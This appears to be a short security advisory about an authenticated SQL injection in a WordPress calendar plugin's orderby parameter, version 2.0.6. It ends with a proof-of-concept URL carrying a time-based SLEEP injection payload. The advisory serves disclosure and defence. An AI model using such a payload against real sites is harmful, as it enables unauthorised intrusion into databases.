The plugin did not escape, validate or sanitise the orderby parameter in its Search Calendars action, before using it in a SQL statement, leading to an authenticated SQL injection issue Note (WPScanTeam): The issue was fixed without bumping the version, so there are two 2.0.6 versions out there, one vulnerable, the other with the fix.
https://example.com/wp-admin/admin.php?page=wpsbc-calendars&paged=1&s=MyCal&orderby=name,%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%286%29%29%29a%29&paged=1